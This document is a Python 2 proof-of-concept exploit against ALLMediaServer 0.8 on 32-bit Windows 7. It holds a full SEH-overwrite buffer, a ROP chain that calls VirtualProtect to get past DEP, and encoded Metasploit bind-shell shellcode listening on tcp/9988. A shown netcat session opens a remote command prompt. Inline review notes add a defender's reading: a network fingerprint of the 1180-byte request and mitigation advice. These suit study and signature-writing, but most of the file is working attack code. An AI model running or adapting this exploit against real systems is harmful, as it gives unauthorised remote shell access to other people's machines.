#!/usr/bin/python
#----------------------------------------------------------------------------------#
# Exploit: ALLMediaServer 0.8 SEH&DEP&ASLR
# Author: b33f (Ruben Boonen)
# OS: Win7 32-bit PRO SP1
# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications
#           /442962ff59a549701f93a6fc4bf94363-ALLMediaServer.exe
#----------------------------------------------------------------------------------#
# root@bt:~/Desktop# python AllServ.py 192.168.111.129
# root@bt:~/Desktop# nc -nv 192.168.111.129 9988
# (UNKNOWN) [192.168.111.129] 9988 (?) open
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
#
# C:\Program Files\ALLMediaServer>
#----------------------------------------------------------------------------------#
# Review notes (defender's reading of this public PoC):
#
# What it is: a single-shot proof of concept against ALLMediaServer 0.8 on the
# exact platform named above. One oversized TCP request to the service port
# overwrites an SEH record; the handler address is a stack-pivot gadget, the
# ROP chain calls VirtualProtect() to make the stack executable (DEP bypass),
# and a Metasploit bind shell then listens on tcp/9988. Every address in the
# chain is hard-coded to specific builds of avformat-53.dll / avcodec-53.dll,
# so it only works when those modules load at the expected base.
#
# Python version: this is Python 2 code. struct.pack() returns str there, so the
# concatenation with "\x90"*10 and the shellcode literal below works; under
# Python 3 struct.pack() returns bytes and `rop + "\x90"*10` raises TypeError.
#
# Network fingerprint (derived from the buffer assembly at the bottom): one
# send() of exactly 32 + 1044 + 4 + 100 = 1180 bytes to tcp/888, starting with
# "JUNK"*8 and carrying the SEH handler value 0xb6 0xc7 0x80 0x66 at fixed
# offset 1076. A follow-up inbound connection to tcp/9988 on the server is the
# bind-shell stage. Neither a reply nor error handling is used by the script.
#
# Mitigation: vendor-side, a fixed server and modules built with ASLR/SafeSEH
# support would invalidate both the handler overwrite and the static gadget
# addresses; network-side, restricting reachability of tcp/888 and alerting on
# unsolicited listeners (tcp/9988 here, but the port is a payload parameter)
# covers the two observable stages.
#----------------------------------------------------------------------------------#

import sys, socket, struct

# Target host comes from the first CLI argument; no validation, so running the
# script without an argument dies with IndexError rather than a usage message.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# tcp/888 is the ALLMediaServer service port this PoC speaks to (the bind shell
# in the payload uses tcp/9988, a separate port).
s.connect((sys.argv[1], 888))

#------------------------------------------------
# ROP-Chain generated by Mona!, only minor edits required
# The program is very helpful providing 250000 gadgets and no apparent badchars
#------------------------------------------------
# Layout: the classic Mona "PUSHAD" VirtualProtect chain. Each gadget loads one
# register with a VirtualProtect argument (see the per-line comments); the final
# PUSHAD pushes all of them so that the stack reads as a ready-made call frame.
# All values are packed as 32-bit little-endian ('<L'), matching the 32-bit OS
# target; the gadget addresses are specific to the named DLL builds and break
# if those modules load elsewhere.
rop = struct.pack('<L',0x6ac35756) # POP EAX # RETN (avformat-53.dll)
rop += struct.pack('<L',0x671ee4e0) # <- *&VirtualProtect()  (pointer to the import slot, not the function itself)
rop += struct.pack('<L',0x6ac7e1ab) # MOV EAX,DWORD PTR DS:[EAX] # RETN (avformat-53.dll)  -> dereference to the real VirtualProtect address
rop += struct.pack('<L',0x66330c98) # XCHG EAX,ESI # RETN (avcodec-53.dll)  -> ESI = VirtualProtect
rop += struct.pack('<L',0x66248004) # POP EBP # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x660c5d07) # ptr to 'jmp esp' (from avcodec-53.dll)  -> EBP = return address used once VirtualProtect returns
rop += struct.pack('<L',0x665a4005) # POP EBX # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x00000201) # <- 201-hex or 513-bytes marked as executable (-> ebx)  (dwSize)
rop += struct.pack('<L',0x665a0aa0) # POP ECX # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x6ad58001) # RW pointer (lpOldProtect) (-> ecx)
rop += struct.pack('<L',0x6604820b) # POP EDI # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x6604820c) # ROP NOP (-> edi)
rop += struct.pack('<L',0x6672a1e2) # POP EDX # RETN (avcodec-53.dll)
rop += struct.pack('<L',0x00000040) # newProtect (0x40) (-> edx)  (PAGE_EXECUTE_READWRITE)
rop += struct.pack('<L',0x6ac35756) # POP EAX # RETN (avformat-53.dll)
rop += struct.pack('<L',0x90909090) # NOPS (-> eax)
rop += struct.pack('<L',0x6657f3c0) # PUSHAD # RETN (avcodec-53.dll)  -> materialises the VirtualProtect call frame

#------------------------------------------------
# msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -t c
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
#------------------------------------------------
# 368 bytes of shikata_ga_nai-encoded bind shell. The encoder output differs on
# every run, so byte signatures on this blob are brittle; the stable observables
# are the request layout described in the header and the listener on tcp/9988.
# The first bytes look like the encoder's usual fnstenv-based GetPC stub, which
# is the one recurring pattern detection tooling tends to key on (not verified
# here by disassembly).
shellcode = (
"\xdb\xc1\xd9\x74\x24\xf4\xbe\x70\x42\xed\x57\x5d\x29\xc9\xb1"
"\x56\x31\x75\x18\x83\xc5\x04\x03\x75\x64\xa0\x18\xab\x6c\xad"
"\xe3\x54\x6c\xce\x6a\xb1\x5d\xdc\x09\xb1\xcf\xd0\x5a\x97\xe3"
"\x9b\x0f\x0c\x70\xe9\x87\x23\x31\x44\xfe\x0a\xc2\x68\x3e\xc0"
"\x00\xea\xc2\x1b\x54\xcc\xfb\xd3\xa9\x0d\x3b\x09\x41\x5f\x94"
"\x45\xf3\x70\x91\x18\xcf\x71\x75\x17\x6f\x0a\xf0\xe8\x1b\xa0"
"\xfb\x38\xb3\xbf\xb4\xa0\xb8\x98\x64\xd0\x6d\xfb\x59\x9b\x1a"
"\xc8\x2a\x1a\xca\x00\xd2\x2c\x32\xce\xed\x80\xbf\x0e\x29\x26"
"\x5f\x65\x41\x54\xe2\x7e\x92\x26\x38\x0a\x07\x80\xcb\xac\xe3"
"\x30\x18\x2a\x67\x3e\xd5\x38\x2f\x23\xe8\xed\x5b\x5f\x61\x10"
"\x8c\xe9\x31\x37\x08\xb1\xe2\x56\x09\x1f\x45\x66\x49\xc7\x3a"
"\xc2\x01\xea\x2f\x74\x48\x63\x9c\x4b\x73\x73\x8a\xdc\x00\x41"
"\x15\x77\x8f\xe9\xde\x51\x48\x0d\xf5\x26\xc6\xf0\xf5\x56\xce"
"\x36\xa1\x06\x78\x9e\xc9\xcc\x78\x1f\x1c\x42\x29\x8f\xce\x23"
"\x99\x6f\xbe\xcb\xf3\x7f\xe1\xec\xfb\x55\x94\x2a\x32\x8d\xf5"
"\xdc\x37\x31\xde\x18\xb1\xd7\x4a\x31\x97\x40\xe2\xf3\xcc\x58"
"\x95\x0c\x27\xf5\x0e\x9b\x7f\x13\x88\xa4\x7f\x31\xbb\x09\xd7"
"\xd2\x4f\x42\xec\xc3\x50\x4f\x44\x8d\x69\x18\x1e\xe3\x38\xb8"
"\x1f\x2e\xaa\x59\x8d\xb5\x2a\x17\xae\x61\x7d\x70\x00\x78\xeb"
"\x6c\x3b\xd2\x09\x6d\xdd\x1d\x89\xaa\x1e\xa3\x10\x3e\x1a\x87"
"\x02\x86\xa3\x83\x76\x56\xf2\x5d\x20\x10\xac\x2f\x9a\xca\x03"
"\xe6\x4a\x8a\x6f\x39\x0c\x93\xa5\xcf\xf0\x22\x10\x96\x0f\x8a"
"\xf4\x1e\x68\xf6\x64\xe0\xa3\xb2\x95\xab\xe9\x93\x3d\x72\x78"
"\xa6\x23\x85\x57\xe5\x5d\x06\x5d\x96\x99\x16\x14\x93\xe6\x90"
"\xc5\xe9\x77\x75\xe9\x5e\x77\x5c")

#------------------------------------------------
# (1) Pivot through the SEH
# 0x6680c7b6 : {pivot 1100} # ADD ESP,440 # POP EBX # POP ESI # POP EDI # RETN [avcodec-53.dll]
# (2) ROP VirtualProtect()
# Brings us 32-bytes into our A's
# (3) Shellcode (368-bytes)
# Current executable space 513-bytes, can be set for more...
#------------------------------------------------
# b00m = 17 gadgets * 4 bytes (68) + 10 NOPs + 368 bytes of shellcode = 446 bytes.
# The NOP sled between chain and shellcode absorbs small landing-offset drift.
b00m = rop + "\x90"*10 + shellcode
# Request layout (offsets from the start of the send):
#   0..31     "JUNK"*8 filler
#   32..1075  b00m padded with "A" to exactly 1044 bytes (1044 - 446 = 598 A's)
#   1076..1079 SEH handler overwrite = 0x6680c7b6 little-endian (pivot gadget above)
#   1080..1179 "X"*100 trailer
# Total 1180 bytes; the fixed prefix, length and handler bytes are what a
# network signature for this specific PoC can key on.
buffer = "JUNK"*8 + b00m + "A"*(1044-len(b00m)) + "\xB6\xC7\x80\x66" + "X"*100
# Fire-and-forget: nothing is read back, and no exception is handled.
s.send(buffer)
s.close()